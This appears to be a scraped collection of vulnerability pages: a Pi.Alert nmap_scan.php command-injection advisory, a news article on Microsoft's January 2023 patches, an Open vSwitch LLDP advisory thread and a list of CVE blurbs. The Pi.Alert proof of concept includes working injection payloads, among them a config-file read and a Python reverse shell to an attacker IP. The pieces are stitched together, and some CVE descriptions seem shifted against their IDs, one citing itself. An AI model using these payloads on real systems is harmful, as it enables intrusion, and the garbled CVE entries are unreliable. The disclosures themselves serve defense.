The jokob-sk/Pi.Alert fork (before 22.12.20) of Pi.Alert allows Remote Code Execution via nmap_scan.php (scan parameter) OS Command Injection.

**Summary**

An OS Command injection vulnerability allows any unauthenticated user to execute arbitrary code on the server.

**Details**

The affected code can be found here:  
https://github.com/jokob-sk/Pi.Alert/blob/main/front/php/server/nmap\_scan.php  
As well as the corresponding leiweibau fork.  
Here is the CWE with more information on how the vulnerability works and can be fixed.  
https://cwe.mitre.org/data/definitions/78.html

Some other helpful links:  
https://cheatsheetseries.owasp.org/cheatsheets/OS\_Command\_Injection\_Defense\_Cheat\_Sheet.html  
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web\_Application\_Security\_Testing/07-Input\_Validation\_Testing/12-Testing\_for\_Command\_Injection  
https://owasp.org/www-community/attacks/Command\_Injection

**PoC**

Using the default configuration, click on any device and then navigate to the nmap tab. Click on one of the nmap buttons and intercept the request via Burp Proxy. Modify the request by adding a semi-colon and then whatever other command you want to run after the scan=.

scan=192.168.1.5&mode=fast

to

scan=;whoami&mode=fast

it will come back as www-data

another useful command is

scan=;cat ../../../config/pialert.conf&mode=fast  
  

Reverse shell via python (change the ip and port to match attacker machine):

scan=;python -c 'import socket,subprocess;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect(("192.168.1.63",4444));subprocess.call(\["/bin/sh","-i"\],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'&mode=fast

Video of the POC (unlisted video):  
https://youtu.be/BR43Af5iykE

This same request can result in XSS as well but eh to that because un-authenticated internal only app.

**Impact**

An attacker with access to the pi.alert web UI would be able to run code on server.

CVE-2022-48252: Remote Code Execution via OS Command Injection

Microsoft's January 2023 Patch Tuesday security update contains fixes for bugs in multiple products. Here's what you need to patch now.

Microsoft's first security update for 2023 contained patches for a whopping 98 vulnerabilities, including one that attackers are actively exploiting and another that is publicly known but has not been exploited yet.

Microsoft identified 11 of the vulnerabilities it disclosed today as being of "critical" severity, meaning organizations using affected products need to prioritize these flaws before addressing the other ones. It rated the remaining 87 as "Important," which is a rating the company uses to describe vulnerabilities that, if exploited, could compromise the confidentiality, integrity, or availability of user data but are often not remotely executable or requires some level of user interaction.

**Bugs in Frequently Attacked Products**

Several of the vulnerabilities in the January 2023 security update affect products that are favorite attacker targets. Five of them, for instance, impact Microsoft Exchange Server and three — including one of the most severe flaws in this month's update — are in SharePoint.

"The volume is definitely concerning, especially given the Exchange patches and SharePoint updates," says Dustin Childs, communication manager for Trend Micro's Zero Day Initiative (ZDI) which reported 25 of the bugs that Microsoft closed today. "These are common targets — and targets that often don’t get patched," he notes. "There are also updates submitted by the National Security Agency and Canada’s Communications Security Establishment. That may raise an eyebrow or two."

Multiple security researchers identified a Microsoft SharePoint Server security feature bypass vulnerability CVE-2023-21743 as one that organizations need to jump on right away because of the risk it presents. The bug allows an unauthenticated attacker to bypass authentication and make an anonymous connection to an affected SharePoint server. One complicating factor with the vulnerability for enterprise security teams is that patching alone is not sufficient to mitigate the threat it presents. In addition, they also need to trigger a SharePoint upgrade, which Microsoft has included in this month's security update to protect against exploit activity, Microsoft said.

"This is not a 'patch it and move on' sort of bug," Childs says. "To fully address this vulnerability, admins need to take additional steps as outlined in the update documentation."

**Zero-Day Bug in Windows ALPC**

Another high-priority vulnerability in the January 2023 update is CVE-2023-21674, an actively exploited bug in Windows Advanced Local Procedure Call (ALPC) that allows an attacker to elevate privileges on a compromised system. The zero-day vulnerability impacts all Windows OS versions and could allow an attacker to escape a browser sandbox and gain system level privileges, Microsoft said.

Satnam Narang, senior staff research engineer at Tenable, says that while full details of the bug are not available, it's possible that attackers likely chained the vulnerability with a flaw in a Chromium-based browser or Microsoft Edge to break out of a browser sandbox and gain full system access. 

"Because of the improvements made in browser security, traditional browser exploits by themselves are limited by sandbox technology, restricting an attacker's ability to access the underlying operating system," Narang tells Dark Reading. He says it is likely that an advanced persistent threat group discovered and exploited the vulnerability as part of a targeted attack.

Microsoft described one of the bugs it addressed this month as publicly known but not exploited. The vulnerability, tracked as CVE-2023-21549, exists on the Windows SMB Witness Service and allows an attacker to execute remote procedure call functions normally restricted to privileged accounts only. Microsoft has assigned a score of 8.8 to the vulnerability even though it has assessed the bug as less likely to be exploited.

**A Flood of Privilege-Escalation Flaws**

Two of the 25 bugs that ZDI reported — and which Microsoft patched this month — were Exchange Server elevation-of-privilege vulnerabilities (CVE-2023-21763 and CVE-2023-21764) that resulted from a failed patch for a previous elevation of privilege flaw in Exchange tracked as CVE-2022-41123. "Thanks to the use of a hard-coded path, a local attacker could load their own DLL and execute code at the level of SYSTEM," Childs says.

In total, 39 of the bugs that Microsoft addressed in its latest update enable elevation of privileges, a category of flaw that the company often has rated as being less severe than RCE bugs. This, however, does not mean that organizations can put off addressing them. "Despite their lower score, these vulnerabilities are typically seen in the early stages of an attack and blocking attackers from gaining SYSTEM or domain-level access early in the kill chain can slow down attackers," said Kev Breen, director of cyber-threat research at Immersive Labs in a statement.

Several of the elevation of privilege bugs in the January update affect the Windows Kernel. Among them are CVE-2023-21772, CVE-2023-21750, CVE-2023-21675 and CVE-2023-21773. "The potential risk from these vulnerabilities is high since they affect all devices that run any Windows OS, starting from Windows 7," security vendor Action1 said. Seven of the privilege escalation bugs have low complexity and require low privileges and no user interaction, meaning they are easy to attack, Action1 said.

Other bugs that security researchers identified as being of high priority in Microsoft's January 2023 security update include CVE-2023-21762 and CVE-2023-21745, both of which are spoofing vulnerabilities in Microsoft Exchange Server. "Email servers like Exchange are high-value targets for attackers, as they can allow an attacker to gain sensitive information through reading emails, or to facilitate Business Email Compromise style attacks," Breen said. Organizations need to be aware of the risks that such bugs preset and mitigate them, he added.

Microsoft also updated its previous guidance around the recent use of Microsoft-signed drivers in malicious campaigns by cybercriminals. The guidance now includes a block list that blocks attackers from using the compromised certificate in their environment. For their recommended actions, the company said, "Microsoft recommends that all customers install the latest Windows updates and ensure their anti-virus and endpoint detection products are up to date with the latest signatures and are enabled to prevent these attacks."

98 Patches: Microsoft Greets New Year With Zero-Day Security Fixes

An out-of-bounds read in Organization Specific TLV was found in various versions of OpenvSwitch.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[<thread-prev\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 21 Dec 2022 12:10:03 +0100
From: Ilya Maximets <i.maximets@....org>
To: oss-security@...ts.openwall.com, ovs-announce@...nvswitch.org,
 ovs-discuss <ovs-discuss@...nvswitch.org>
Cc: i.maximets@....org, Aaron Conole <aconole@...hat.com>,
 Qian Chen <cq674350529@...il.com>, John Helmert III <ajak@...too.org>
Subject: Re: \[ADVISORY\] LLDP underflow while parsing malformed Auto Attach TLV
 (Open vSwitch)

On 12/20/22 22:39, Ilya Maximets wrote:
> Description
> ===========
> 
> Multiple versions of Open vSwitch are vulnerable to crafted LLDP
> packets causing denial of service, and data underflow attacks.
> Triggering the vulnerabilities requires LLDP processing to be enabled
> for a specific port.  Open vSwitch versions prior to 2.4.0 are not
> vulnerable.
> 
> The Common Vulnerabilities and Exposures project (cve.mitre.org)
> did not assign the identifier to this issue yet.  The identifier will
> be communicated separately.

Following CVE identifiers have been allocated for the issue (one per
TLV type since they can have a slightly different effect):

 - CVE-2022-4337 for Out-of-Bounds Read in Organization Specific TLV
 - CVE-2022-4338 for Integer Underflow in Organization Specific TLV

The fix referenced in this advisory covers both issues.

> This issue does not affect the \`lldpd'
> project, although they share a code base.  The issue is related to
> parsing the Auto Attach TLVs, which is specific to the Open vSwitch
> implementation.
> 
> 
> Mitigation
> ==========
> 
> For any version of Open vSwitch, preventing LLDP packets from reaching
> Open vSwitch mitigates the vulnerability.  We do not recommend
> attempting to mitigate the vulnerability this way because of the
> following difficulties:
> 
>     - Open vSwitch obtains packets before the iptables host firewall,
>       so ebtables on the Open vSwitch host cannot ordinarily block the
>       vulnerability.
> 
>     - If Open vSwitch is configured to receive and transmit LLDP
>       messages, the required functionality will need to be disabled
>       potentially disrupting the network.
> 
> We have found that Open vSwitch is subject to a denial of service, and
> possibly a remote code execution exploit when LLDP processing is enabled
> on an interface.  By default, interfaces are not configured to process
> LLDP messages.
> 
> 
> Fix
> ===
> 
> Patches to fix these vulnerabilities in Open vSwitch 2.13.x and newer are
> applied to the appropriate branches, and the original patch is located
> at:
> 
>    https://mail.openvswitch.org/pipermail/ovs-dev/2022-December/400596.html
> 
> Recommendation
> ==============
> 
> We recommend that users of Open vSwitch apply the respective patch, or
> upgrade to a known patched version of Open vSwitch.  These include:
> 
> \* 3.0.3
> \* 2.17.5
> \* 2.16.6
> \* 2.15.7
> \* 2.14.8
> \* 2.13.10
> 
> 
> Acknowledgments
> ===============
> 
> The Open vSwitch team wishes to thank the reporter:
> 
>   Qian Chen <cq674350529@...il.com>
> 

**Download attachment "**OpenPGP\_0xB9F7EC77C829BF96.asc**" of type "**application/pgp-keys**" (4740 bytes)**

**Download attachment "**OpenPGP\_signature**" of type "**application/pgp-signature**" (841 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-4337: security - Re: [ADVISORY] LLDP underflow while parsing malformed Auto Attach TLV (Open vSwitch)

Windows Layer 2 Tunneling Protocol (L2TP) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21543, CVE-2023-21546, CVE-2023-21556, CVE-2023-21679.

CVE-2023-21555

Windows Layer 2 Tunneling Protocol (L2TP) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21543, CVE-2023-21546, CVE-2023-21555, CVE-2023-21679.

CVE-2023-21556

Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21548.

CVE-2023-21535

Microsoft SharePoint Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21744.

CVE-2023-21742

Microsoft Office Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21734.

CVE-2023-21735

Microsoft Office Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21735.

CVE-2023-21734

3D Builder Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21780, CVE-2023-21781, CVE-2023-21782, CVE-2023-21783, CVE-2023-21784, CVE-2023-21786, CVE-2023-21787, CVE-2023-21788, CVE-2023-21789, CVE-2023-21790, CVE-2023-21791, CVE-2023-21792, CVE-2023-21793.

Tag

#rce